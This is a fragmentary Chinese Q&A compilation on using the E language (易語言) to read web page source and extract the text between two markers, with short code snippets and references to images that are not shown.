返回 (取文本中間 (需取文本, 左邊位置 + 左邊長度, 長度 - (左邊位置 + 左邊長度) - (長度 - 右邊位置)))
--------------------創建完畢-------------------------廠------------------------------------------------------------
新建個編輯框1.然後在建個按鈕,在按鈕里輸入代碼
編輯框1.內容=取文本中間內容 (zxcvbnm123456789asfhyf, zxcvbnm, asfhyf)
點擊這個按鈕,編輯框1的內容就是123456789
圖片概要:
問題五:易語言 取網頁源碼 可以實時獲取超文本瀏覽框里的源碼,和 查看源代碼一樣。
問題六:易語言這個取網頁源碼如何取文本中間?有圖 到整數刪除了就可以了
問題七:易語言 如何讀取網頁源文件的代碼! .版本 2
.支持庫 internet
.子程序 __啟動窗口_創建完畢
_啟動窗口.標題 = 到文本 (HTTP讀文件 (「你要打開的t攻t地址。txt」))
問題八:求易語言多線程提取網頁源碼的例子 這是一個最簡單的多線程網頁訪問保存網頁的程序,如果滿意採納哦
問題九:易語言取網頁源碼中的元素內容,應該關於精易模塊 80分 你要的只是取這個 span 里的內容嗎?
用了精易模塊的話
你可以用 文本_取出中間文本() 命令來獲取,命令格式如下:
文本_取出中間文本(原文本,目標文本左邊,目標文本右邊)
原文本這里就可以是你讀取出來的網頁源碼
目標文本左邊,在你的圖片里,就可以是
目標文本右邊,在你的圖片里,就是
問題十:易語言取網頁指定內容源碼 要方便快捷的話,就用精易模塊裡面的取出中間文本(),不想用模塊的話就用分割文本。建議你用精易模塊的文本_取中間文本()